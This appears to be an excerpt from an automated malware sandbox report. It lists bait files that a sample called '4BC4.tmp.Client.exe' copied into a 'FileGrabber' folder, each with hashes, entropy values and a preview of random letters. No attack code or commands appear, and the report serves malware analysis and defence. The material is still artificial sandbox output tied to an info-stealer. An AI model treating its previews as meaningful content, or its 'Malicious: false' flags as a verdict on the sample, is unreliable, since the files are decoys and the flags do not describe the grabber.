SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\ProgramData\134349\FileGrabber\Documents\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\ProgramData\134349\FileGrabber\Documents\VLZDGUKUTZ.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\ProgramData\134349\FileGrabber\Documents\VLZDGUKUTZ\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\ProgramData\134349\FileGrabber\Documents\VLZDGUKUTZ\KZWFNRXYKI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Reputation:	unknown
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\ProgramData\134349\FileGrabber\Documents\VLZDGUKUTZ\NIKHQAIQAU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\ProgramData\134349\FileGrabber\Documents\VLZDGUKUTZ\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Reputation:	unknown
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\ProgramData\134349\FileGrabber\Documents\VLZDGUKUTZ\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\ProgramData\134349\FileGrabber\Documents\WUTJSCBCFX.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Reputation:	unknown
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\ProgramData\134349\FileGrabber\Documents\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\ProgramData\134349\FileGrabber\Documents\XZXHAVGRAG\KATAXZVCPS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRIS